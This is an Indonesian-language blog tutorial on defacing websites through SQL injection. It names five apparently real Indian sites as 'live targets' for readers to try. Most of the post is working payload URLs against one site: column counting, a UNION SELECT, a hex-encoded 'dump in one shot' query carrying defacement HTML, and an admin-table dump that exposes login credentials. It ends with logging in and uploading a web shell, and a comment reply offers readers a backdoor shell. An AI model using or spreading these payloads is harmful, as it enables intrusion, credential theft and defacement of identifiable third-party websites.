Deface poc SQL-Injection Up Shell

 (Deface sql-i dengan 4 live target!!)




Alat bahan
  • Dork : inurl:product.php?id=10 site:in (kembangin lagi gann)
  • Internet
  • Shell backdoor
  • Anonhackbar jika ada,kalau gak ada di browser biasa juga bisa,cuman mempermudah aja gan.
  • Face yang good looking :)
  • Kue malkis kokolanya gan,mamah tau sendiri,pasti hallal ngehek nya bro👊

Live target:

•http://apos.in/product.php?id=4&pname=%20Moong%20Dal%20500%20Gm
Nah yang di atas akan jadi live target.
•https://www.emeraldinteriors.in/admin/
•http://www.currypatta.in/admin/           •https://styleup.co.in/admin/
•https://www.salamenterprises.co.in/admin/

Nah ini buat kalian coba ya guys:) web nya semua vuln sql,level:easy.

Okee kita lanjut ke tutornya:
1.dorking/reserve ip juga boleh kalau mau.
2.kalo dah nemu yang vuln lanjut ke nyari adlognya,kalau ada adlog baru gass inject.
3.berhubung gw dah ada live target jadi kita gass ok..
4. http://apos.in/product.php?id=4&pname=%20Moong%20Dal%20500%20Gm
Pertama lu kasih tanda (') biar tau vuln atau enggaknya,lanjut..
5.kita cari adlognya dulu gan..
http://apos.in/admin/  nahh ternyata ini adlognya mari kita gass inject:v
5.http://apos.in/product.php?id=4'&pname=%20Moong%20Dal%20500%20Gm ->Error
6.http://apos.in/product.php?id=4'+order+by+1--+&pname=%20Moong%20Dal%20500%20Gm ->Normal
(Terus cari sampai error)
7.http://apos.in/product.php?id=4'+order+by+122--+&pname=%20Moong%20Dal%20500%20Gm -> error di angka 122 berarti jumlah kolomnya ada 121,oke kita lanjut ke nyari angka togelnya:v
8.http://apos.in/product.php?id=4%27+and+0+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121--+&pname=%20Moong%20Dal%20500%20Gm
Nah angka togel nya muncul,kali ini gw pilih angka 12,kemudian tinggal kita dump database nya pakai dios kalian,kalau gak ada pake aja dios gw nih..

/*!00000concat*/(0x3c63656e7465723e3c696d67207372633d2768747470733a2f2f692e6962622e636f2f5932544e3254502f32303230303432332d3230353733342e6a7067273e2c3c62723e2c3c68313e416b626172204665617420416e696e64613c2f68313e2c3c62723e2c3c68323e5765204c6f766520496e6a656374696f6e7320546f204578706c6f69743c2f68323e2c3c62723e2c3c617564696f206175746f706c61793d226175746f706c61792220636f6e74726f6c733d22636f6e74726f6c73227372633d2268747470733a2f2f632e746f7034746f702e696f2f6d5f3135333367377a3230302e6d70332220747970653d22617564696f2f6d706567223e3c2f617564696f3e2c3c68353e20436f707972696768742041574e2047616e73203c2f68353e3c2f63656e7465723e,0x3c2f666f6e743e,0x3c62723e,0x3c62723e,0x3c62723e,0x3c62723e,0x557365723a3a,user(),0x3c62723e,0x56657273696f6e3a3a,version(),0x3c62723e,0x44617461626173653a3a,database(),0x3c62723e,0x506c7567696e3a3a,@@PLUGIN_DIR,0x3c62723e,0x506f72743a3a,@@port,0x3c62723e,0x353796d6c696e6b3a3a,@@HAVE_SYMLINK,0x3c62723e,0x53534c3a3a,@@HAVE_SSL,0x3c62723e,0x446174616469723a3a,@@datadir,0x3c62723e,0x486f73746e616d653a3a,@@hostname,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x))

10.Kita coba masukin ke angka togel dios nya

http://apos.in/product.php?id=4'+and+0+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,10,11,/*!00000concat*/(0x3c63656e7465723e3c696d67207372633d2768747470733a2f2f692e6962622e636f2f5932544e3254502f32303230303432332d3230353733342e6a7067273e2c3c62723e2c3c68313e416b626172204665617420416e696e64613c2f68313e2c3c62723e2c3c68323e5765204c6f766520496e6a656374696f6e7320546f204578706c6f69743c2f68323e2c3c62723e2c3c617564696f206175746f706c61793d226175746f706c61792220636f6e74726f6c733d22636f6e74726f6c73227372633d2268747470733a2f2f632e746f7034746f702e696f2f6d5f3135333367377a3230302e6d70332220747970653d22617564696f2f6d706567223e3c2f617564696f3e2c3c68353e20436f707972696768742041574e2047616e73203c2f68353e3c2f63656e7465723e,0x3c2f666f6e743e,0x3c62723e,0x3c62723e,0x3c62723e,0x3c62723e,0x557365723a3a,user(),0x3c62723e,0x56657273696f6e3a3a,version(),0x3c62723e,0x44617461626173653a3a,database(),0x3c62723e,0x506c7567696e3a3a,@@PLUGIN_DIR,0x3c62723e,0x506f72743a3a,@@port,0x3c62723e,0x353796d6c696e6b3a3a,@@HAVE_SYMLINK,0x3c62723e,0x53534c3a3a,@@HAVE_SSL,0x3c62723e,0x446174616469723a3a,@@datadir,0x3c62723e,0x486f73746e616d653a3a,@@hostname,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x)),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121--+&pname= Moong Dal 500 Gm

11.dump table adminnya gan pake dios,jadi gini :
http://apos.in/product.php?id=4'+and+0+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,10,11,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,name,0x203a3a20,pass,0x3c62723e))))x),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121--+&pname= Moong Dal 500 Gm
Nah jadi user passwordnya adalah account@apos.in/admin@
12.tinggal login deh 


Nah kalo dah masuk gini tinggal up shell deh:)


Noh one dir lagi wkwk,yaudah cukup segini aja tutorial nya,mohon maaf bila kurang jelas,bisa ditanyakan di kolom komentar:)


2 komentar untuk "Deface poc SQL-Injection Up Shell"

  1. Gimana bang cara bisa punya shell

    BalasHapus
    Balasan
    1. Kamu scroll ke paling bawah kemudian klik 'hubungi admin' ,nanti saya kasih shell backdoor yang bagusnya

      Hapus

Posting Komentar

Berlangganan via Email